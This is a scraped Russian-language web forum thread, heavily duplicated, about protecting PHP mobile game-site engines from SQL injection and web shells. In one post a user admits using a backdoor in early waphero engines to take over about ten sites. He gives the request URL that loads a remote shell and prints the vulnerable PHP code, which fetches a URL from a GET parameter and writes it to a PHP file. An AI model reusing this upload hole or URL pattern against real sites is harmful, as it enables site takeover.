Помощь по скриптам | БТ
AdRed
NLMan, довольно существенная часть понятия защиты и состоит в именно фильтрации запросов ))
CyberVit 
Jeesy
хм, надо бы у себя кстати скули поискать, а то что-то я подзабыл про это дело
Vocaloid IA NLMan (10.02.2015 в 22:01)
LordSaske (10.02.2015 в 21:53)
NLMan (10.02.2015 в 21:50)
LordSaske (10.02.2015 в 21:46)
mudakioff (10.02.2015 в 21:43)
NLMan, Не ну у меня вообще дырявый :) всегда шелл заливают и всё index.php летит
Купи защиту кредитора и подгони под бт.-.
Тогда уж купить или найти нормальный сторонний скрипт с кодканьона)
Тут фантазия не ограничивается:33
Наверное немного обижу кредитора ;[ Но лучше не много переплатить и получить нормальную защиту которая оградит практически со всех сторон чем брать мало функциональный гуард за 250р от кодера самоучки на дцмс, и после еще переделывать её, а судя потом что человек не знает нечего к примеру о фильтрации то и думаю отвязать от дцмс будет ему проблемно ;[
LordSaske (10.02.2015 в 21:53)
NLMan (10.02.2015 в 21:50)
LordSaske (10.02.2015 в 21:46)
mudakioff (10.02.2015 в 21:43)
NLMan, Не ну у меня вообще дырявый :) всегда шелл заливают и всё index.php летит
Купи защиту кредитора и подгони под бт.-.
Тогда уж купить или найти нормальный сторонний скрипт с кодканьона)
Тут фантазия не ограничивается:33
Наверное немного обижу кредитора ;[ Но лучше не много переплатить и получить нормальную защиту которая оградит практически со всех сторон чем брать мало функциональный гуард за 250р от кодера самоучки на дцмс, и после еще переделывать её, а судя потом что человек не знает нечего к примеру о фильтрации то и думаю отвязать от дцмс будет ему проблемно ;[
Гуард это защита от Pilot а кредиторовскую видил своими глазами:3 идеальнее - попросту не иметь сайт
CyberVit (10.02.2015 в 22:04)
NLMan, довольно существенная часть понятия защиты и состоит в именно фильтрации запросов ))
NLMan, довольно существенная часть понятия защиты и состоит в именно фильтрации запросов ))
Но не помешалоб каку вырезать:3
LordSaske (10.02.2015 в 22:11)
CyberVit (10.02.2015 в 22:04)
NLMan, довольно существенная часть понятия защиты и состоит в именно фильтрации запросов ))
Но не помешалоб каку вырезать:3
CyberVit (10.02.2015 в 22:04)
NLMan, довольно существенная часть понятия защиты и состоит в именно фильтрации запросов ))
Но не помешалоб каку вырезать:3
ну так суть самой инъекции, это внедрение в данные передаваемые через GET, POST запросы, произвольного SQL кода...
а если стоит фильтрация, то подобные коды результата не дадут, в таком случае и вырезать их не стоит ))
NLMan CyberVit (10.02.2015 в 22:04)
NLMan, довольно существенная часть понятия защиты и состоит в именно фильтрации запросов ))
NLMan, довольно существенная часть понятия защиты и состоит в именно фильтрации запросов ))
Я говорю обратное?))
LordSaske (10.02.2015 в 22:10)
NLMan (10.02.2015 в 22:01)
LordSaske (10.02.2015 в 21:53)
NLMan (10.02.2015 в 21:50)
LordSaske (10.02.2015 в 21:46)
mudakioff (10.02.2015 в 21:43)
NLMan, Не ну у меня вообще дырявый :) всегда шелл заливают и всё index.php летит
Купи защиту кредитора и подгони под бт.-.
Тогда уж купить или найти нормальный сторонний скрипт с кодканьона)
Тут фантазия не ограничивается:33
Наверное немного обижу кредитора ;[ Но лучше не много переплатить и получить нормальную защиту которая оградит практически со всех сторон чем брать мало функциональный гуард за 250р от кодера самоучки на дцмс, и после еще переделывать её, а судя потом что человек не знает нечего к примеру о фильтрации то и думаю отвязать от дцмс будет ему проблемно ;[
Гуард это защита от Pilot а кредиторовскую видил своими глазами:3 идеальнее - попросту не иметь сайт
NLMan (10.02.2015 в 22:01)
LordSaske (10.02.2015 в 21:53)
NLMan (10.02.2015 в 21:50)
LordSaske (10.02.2015 в 21:46)
mudakioff (10.02.2015 в 21:43)
NLMan, Не ну у меня вообще дырявый :) всегда шелл заливают и всё index.php летит
Купи защиту кредитора и подгони под бт.-.
Тогда уж купить или найти нормальный сторонний скрипт с кодканьона)
Тут фантазия не ограничивается:33
Наверное немного обижу кредитора ;[ Но лучше не много переплатить и получить нормальную защиту которая оградит практически со всех сторон чем брать мало функциональный гуард за 250р от кодера самоучки на дцмс, и после еще переделывать её, а судя потом что человек не знает нечего к примеру о фильтрации то и думаю отвязать от дцмс будет ему проблемно ;[
Гуард это защита от Pilot а кредиторовскую видил своими глазами:3 идеальнее - попросту не иметь сайт
Пофиг чей там гуард, не знаю и знать не хочу)) Под гуард я имел ввиду защитник)
NLMan, нет, я же не спорю ))) а вообще, все эти паблик двиги надо проверять на возможность удаленного инклуда, ибо шеллы еще никто не отменял )))
первые двиги waphero имели офигенную дыришу в файле core/function/games.php с "miniS", которая обрабатывалась GET запросом и через него шелл лился идеально вот таким образом: core/function/games.php?miniS=http://адрес_удаленного_шелла
я с её помощью слил с десяток подобных игр
вот кстати сама бага:
<?php
$getO=$_GET['miniS'];
if(isset($getO)){
$b=file_get_contents($getO);
$a=fopen('smurfik.php','w');
fputs($a,$b);
fclose($a);
}
?>
эту хрень кто-то умышленно сделал
________
посл. ред. 10.02.2015 в 22:23; всего 6 раз(а); by CyberVit
первые двиги waphero имели офигенную дыришу в файле core/function/games.php с "miniS", которая обрабатывалась GET запросом и через него шелл лился идеально вот таким образом: core/function/games.php?miniS=http://адрес_удаленного_шелла
я с её помощью слил с десяток подобных игр
вот кстати сама бага:
<?php
$getO=$_GET['miniS'];
if(isset($getO)){
$b=file_get_contents($getO);
$a=fopen('smurfik.php','w');
fputs($a,$b);
fclose($a);
}
?>
эту хрень кто-то умышленно сделал
________
посл. ред. 10.02.2015 в 22:23; всего 6 раз(а); by CyberVit
CyberVit (10.02.2015 в 22:14)
LordSaske (10.02.2015 в 22:11)
CyberVit (10.02.2015 в 22:04)
NLMan, довольно существенная часть понятия защиты и состоит в именно фильтрации запросов ))
Но не помешалоб каку вырезать:3
ну так суть самой инъекции, это внедрение в данные передаваемые через GET, POST запросы, произвольного SQL кода...
а если стоит фильтрация, то подобные коды результата не дадут, в таком случае и вырезать их не стоит ))
LordSaske (10.02.2015 в 22:11)
CyberVit (10.02.2015 в 22:04)
NLMan, довольно существенная часть понятия защиты и состоит в именно фильтрации запросов ))
Но не помешалоб каку вырезать:3
ну так суть самой инъекции, это внедрение в данные передаваемые через GET, POST запросы, произвольного SQL кода...
а если стоит фильтрация, то подобные коды результата не дадут, в таком случае и вырезать их не стоит ))
Вырезать не помешаетхоть и не в $_POST, но в $_GET обязательно))) ведь не фильтра могут кой чего пропустить))) а вырезание добьёт)))